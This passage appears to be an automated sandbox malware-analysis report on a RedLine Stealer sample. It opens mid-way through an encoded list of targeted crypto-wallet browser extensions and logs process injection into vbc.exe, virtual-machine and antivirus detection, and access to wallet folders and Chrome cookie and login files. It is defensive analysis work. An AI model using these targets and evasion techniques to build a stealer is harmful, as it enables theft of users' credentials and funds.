FpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:576:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_01
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00408329 push ecx; ret 0_2_0040833C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_07368976 push es; retf 2_2_07368977
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040A6AC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040A6AC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 1980Thread sleep count: 4610 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4848Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-5807
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00409EB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EB4
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040A6AC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040A6AC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00403620 GetVersion,AreFileApisANSI,FindFirstPrinterChangeNotification,QueryPerformanceFrequency,WritePrinter,GetProcessHeap,FindClosePrinterChangeNotification,CreateEventW,GetLogicalDrives,CreateFileW,CreateFileW,GetCurrentProcess,CreateMutexW,CreateFileW,IsProcessorFeaturePresent,FindClosePrinterChangeNotification,FindClosePrinterChangeNotification,0_2_00403620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00414154 mov eax, dword ptr fs:[00000030h]0_2_00414154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00409EB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EB4
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040E97E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040E97E
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00406F82 SetUnhandledExceptionFilter,0_2_00406F82
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00409384 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409384

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 11BD008Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00414189 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_00414189
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: GetLocaleInfoA,0_2_0040EF07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_004084CC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004084CC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_00403620 GetVersion,AreFileApisANSI,FindFirstPrinterChangeNotification,QueryPerformanceFrequency,WritePrinter,GetProcessHeap,FindClosePrinterChangeNotification,CreateEventW,GetLogicalDrives,CreateFileW,CreateFileW,GetCurrentProcess,CreateMutexW,CreateFileW,IsProcessorFeaturePresent,FindClosePrinterChangeNotification,FindClosePrinterChangeNotification,0_2_00403620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe PID: 3384, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 260, type: MEMORYSTR
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: k2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: k6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 260, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe PID: 3384, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 260, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts221
                      Windows Management Instrumentation                      		Path Interception411
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools                      		LSASS Memory24
                      Security Software Discovery                      		Remote Desktop Protocol3
                      Data from Local System                      		Exfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)231
                      Virtualization/Sandbox Evasion                      		Security Account Manager11
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)411
                      Process Injection                      		NTDS231
